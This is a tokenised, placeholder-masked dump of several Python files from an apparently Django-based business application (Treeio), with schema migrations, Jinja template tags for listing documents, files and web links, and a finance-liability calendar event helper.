'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from coffin import template <EOL> from treeio . core . rendering import render_to_string <EOL> from jinja2 import contextfunction , Markup <EOL> from django . template import RequestContext <EOL> register = template . Library ( ) <EOL> @ contextfunction <EOL> def documents_document_list ( context , documents , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : documents , <EOL> '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_document_list ) <EOL> @ contextfunction <EOL> def documents_file_list ( context , files , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : files , '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_file_list ) <EOL> @ contextfunction <EOL> def documents_weblink_list ( context , links , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : links , '<STR_LIT>' : skip_group } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_weblink_list ) <EOL> @ contextfunction <EOL> def documents_objects_list ( context , objects , folder , skip_group = False ) : <EOL> "<STR_LIT>" <EOL> request = context [ '<STR_LIT>' ] <EOL> response_format = '<STR_LIT:html>' <EOL> if '<STR_LIT>' in context : <EOL> response_format = context [ '<STR_LIT>' ] <EOL> return Markup ( render_to_string ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : objects , <EOL> '<STR_LIT>' : skip_group , '<STR_LIT>' : folder } , <EOL> context_instance = RequestContext ( request ) , <EOL> response_format = response_format ) ) <EOL> register . object ( documents_objects_list ) </s>
<s> """<STR_LIT>""" <EOL> from treeio . finance . models import Liability <EOL> from treeio . core . models import Object <EOL> from treeio . events . rendering import EventRenderer <EOL> from django . db . models import Q <EOL> import datetime <EOL> def get_events ( request ) : <EOL> "<STR_LIT>" <EOL> events = [ ] <EOL> query = Q ( due_date__isnull = False ) <EOL> liabilities = Object . filter_by_request ( <EOL> request , manager = Liability . objects . filter ( query ) ) <EOL> for liability in liabilities : <EOL> if liability . due_date : <EOL> old = liability . due_date <EOL> new_due_date = datetime . datetime ( <EOL> year = old . year , month = old . month , day = old . day , hour = <NUM_LIT:12> , minute = <NUM_LIT:0> , second = <NUM_LIT:0> ) <EOL> event = EventRenderer ( <EOL> liability . name , None , new_due_date , liability . get_absolute_url ( ) ) <EOL> event . css_class += "<STR_LIT>" <EOL> events . append ( event ) <EOL> return events </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) <EOL> def backwards ( self , orm ) : <EOL> db . alter_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 